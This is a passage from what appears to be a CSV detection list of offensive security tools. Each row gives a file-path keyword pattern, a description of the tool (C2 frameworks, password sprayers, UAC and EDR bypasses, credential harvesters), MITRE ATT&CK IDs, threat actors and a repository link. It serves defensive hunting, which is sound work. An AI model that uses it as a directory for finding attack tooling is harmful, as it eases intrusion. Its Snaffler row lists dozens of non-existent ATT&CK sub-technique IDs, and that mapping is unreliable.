TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Tools/Squeak/Squeak*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Tool-X.git*,offensive_tool_keyword,Tool-X,Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.,T1212 - T1566 - T1550 - T1133,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/Tool-X,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/top_mots_combo.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/top-usernames-shortlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/tor-0.*.tar.gz*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tor-consensus-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tor-gencert.exe*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/traceroute-geolocation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tracers_fuzzer.cc*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/trackerjacker*,offensive_tool_keyword,trackerjacker,Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.,T1040 - T1018 - T1591,TA0007 - - TA0043,N/A,N/A,Information Gathering,https://github.com/calebmadrigal/trackerjacker,1,0,N/A,N/A,10,2537,190,2020-12-24T20:53:31Z,2016-12-18T22:01:13Z -*/Trackflaw/CVE*.py*,offensive_tool_keyword,poc,Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear,Exploitation tools,https://github.com/Trackflaw/CVE-2023-23397,1,1,N/A,N/A,1,99,24,2023-03-24T10:46:38Z,2023-03-20T16:31:54Z -*/transports/scramblesuit/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/trap_command.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/TreeWalker.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/TREVORspray.git*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/trevorspray.log*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/trganda/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,1,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z -*/trick_ryuk.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/trickbot.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/tried_logins.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/TriggerLinux/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/trollsploit/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/TROUBLE-1/Vajra*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/trusted_sec_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/trusted_sec_remote_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/trustedsec/*,offensive_tool_keyword,Github Username,github repo hosting various exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/trustedsec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tso-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tso-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tweetshell.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/twittor.git*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*/UACBypasses/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/UACME.git*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*/UAC-SilentClean/*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/uberfile.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ubiquiti-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/udmp-parser.git*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*/umeshshinde19/instainsane*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/unDefender.exe*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*/unDefender.git*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*/undertheradar.git*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*/unhook-bof*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*/unhook-bof*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/unhook-bof,1,1,N/A,10,10,240,61,2021-09-18T18:12:41Z,2021-01-13T02:20:44Z -*/unhook-bof*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/unhook-bof,1,1,N/A,10,10,51,14,2022-03-13T15:57:10Z,2021-07-02T14:55:38Z -*/UnhookingPatch.git*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/unicorn.git*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*/unicorn.py*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*/unittest.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/unshackle.git*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/unshackle.modules*,offensive_tool_keyword,unshackle,Unshackle is an open-source 